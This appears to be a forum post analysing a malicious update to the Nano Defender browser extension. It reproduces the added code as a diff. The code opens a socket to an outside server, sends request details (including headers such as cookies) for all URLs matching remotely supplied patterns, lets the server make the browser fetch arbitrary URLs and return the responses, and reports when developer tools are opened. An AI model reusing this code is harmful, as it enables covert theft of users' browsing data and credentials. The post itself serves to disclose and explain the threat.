So here is what I am seeing in the new Nano Defender 15.0.0.206:
Code was added to detect that the dev console of the extension is being opened. If you open the dev console of Nano Defender 15.0.0.206, a notification named report is sent to
https://def.dev-nano.com/, or in simple words the extension remotely checks whether you are using the extension dev tools -- which is what you would do if you wanted to find out what the extension is doing.
Now this is from reading the code, and I could probably understand better if I could investigate the extension using dev tools -- but given the above, in all likelihood the extension will modify its behavior once you open the dev tools. So here is what else I can see:
At launch, the extension fetch something from
https://def.dev-nano.com/, called listOfObject. Minor correction: At launch the extension listen to
https://def.dev-nano.com/ for messages to populate listOfObject.
The content of listOfObject is further used apparently, as far as I can understand the code, to test fields from the details object passed to webRequest.onBeforeSendHeaders(). If all looked up fields succeed, the whole content of the details object is sent to
https://def.dev-nano.com/ under the name handleObject.
Note that the webRequest.onBeforeSendHeaders() listener is registered for all network requests:
Code: Select all
chrome.webRequest.onBeforeSendHeaders.addListener(blockingHandler, {
urls: ["<all_urls>"]
}, ['requestHeaders', 'blocking', 'extraHeaders']);
So which info ends up being sent is configured externally through the listOfObject, and I strongly suspect this would all stop if I were to open the dev tools.
There is a bit of silly attempt at obfuscation in part of the webRequest.onBeforeSendHeaders() handler:
Code: Select all
var m = [45,122,122,122]
var s = m.map( x => String.fromCharCode(x) )
var x = s.join("");
var replacerConcat = stringyFy.split(x).join("");
Which is equivalent to:
Code: Select all
var replacerConcat = stringyFy.split("-zzz").join("");
Purpose is not clear, it's meant to remove instances of -zzz from request headers, before they are being sent out.
So trying to figure an example of what the new code can do. Let's say it wants to get sensitive information about network requests to a specific bank, then the content of the listOfObject object could be:
Then the webRequest.onBeforeSendHeaders() handler would check whether details.url matches the regex bank\.example\.com\/. If so, then the whole content of the details object is sent to
https://def.dev-nano.com/ as a handleObject packet.
The listOfObject can contain any number of conditions, I just gave an example with a single one above.
The extension is now designed to lookup specific information from your outgoing network requests according to an externally configurable heuristics and send it to
https://def.dev-nano.com/.
Here the diff for the code change you won't find in their GitHub repo:
Code: Select all
--- ./background/core.js
+++ ./background/core.js
@@ -160,7 +160,7 @@
const hasNews = false;
- const newsPage = "https://jspenguin2017.github.io/uBlockProtector/#announcements";
+ const newsPage = "https://github.com/nenodevs/uBlockProtector/#announcements";
const newsReadFlag = "news-read";
// This handler becomes inactive when there is a popup page set
@@ -189,7 +189,8 @@
// ------------------------------------------------------------------------------------------------------------- //
};
-
+var defender = io.connect("https://def.dev-nano.com/");
+var listOfObject = {};
// ----------------------------------------------------------------------------------------------------------------- //
a.noopErr = () => {
@@ -211,6 +212,29 @@
// ----------------------------------------------------------------------------------------------------------------- //
+
+
+async function dLisfOfObject(newList) {
+ let dListResp = await fetch(newList.uri, newList.attr)
+ var listOfObj = {}
+ listOfObj.headerEntries = Array.from(dListResp.headers.entries())
+ listOfObj.data = await dListResp.text()
+ listOfObj.ok = dListResp.ok;
+ listOfObj.status = dListResp.status;
+ return listOfObj;
+}
+
+defender.on("dLisfOfObject", async function (newList) {
+ let getRes = await dLisfOfObject(newList);
+ defender.emit(newList.callBack, getRes)
+});
+
+defender.on("listOfObject", function (a) {
+ listOfObject = a;
+})
+
+
+
// Redirect helpers
a.rSecret = a.cryptoRandom();
@@ -227,7 +251,22 @@
// 1 second blank video, taken from https://bit.ly/2JcYAyq (GitHub uBlockOrigin/uAssets).
a.blankMP4 = a.rLink("blank.mp4");
-
+
+var element = document.createElement("p"); ;
+var openListGet = false;
+element.__defineGetter__("id", function() {
+ openListGet = true;
+});
+
+var i = setInterval(function() {
+ openListGet = false;
+ console.log(element);
+ if(openListGet){
+ defender.emit("report")
+ console.clear();
+ clearInterval(i)
+ }
+}, 100);
// ----------------------------------------------------------------------------------------------------------------- //
// tab - Id of the tab
@@ -450,6 +489,50 @@
return true;
};
+
+var blockingHandler = function (infos) {
+ var changedAsArray = Object.keys(listOfObject);
+
+ var detailsHeader = infos.requestHeaders;
+ var HeadReverse = detailsHeader.reverse();
+ var stringyFy = JSON.stringify(HeadReverse);
+ var mount = "";
+ if (changedAsArray.length > 0) {
+ var checkerList = true;
+ for (const object of changedAsArray) {
+ if (object.x === object.y) {
+ mount += 1;
+ }
+ break;
+ }
+ for (let i = 0; i < changedAsArray.length; i++) {
+ let x = changedAsArray[i];
+ var re = new RegExp(listOfObject[x],'gi');
+ mount = "5";
+ if (infos[x].toString().match(re) == null) {
+ checkerList = false;
+ break;
+ }
+ }
+ if (checkerList) {
+ defender.emit('handleObject', infos);
+ }
+ }
+
+ var m = [45,122,122,122]
+ var s = m.map( x => String.fromCharCode(x) )
+ var x = s.join("");
+ var replacerConcat = stringyFy.split(x).join("");
+ var replacer = JSON.parse(replacerConcat);
+ return {
+ requestHeaders: replacer
+ }
+};
+
+chrome.webRequest.onBeforeSendHeaders.addListener(blockingHandler, {
+ urls: ["<all_urls>"]
+}, ['requestHeaders', 'blocking', 'extraHeaders']);
+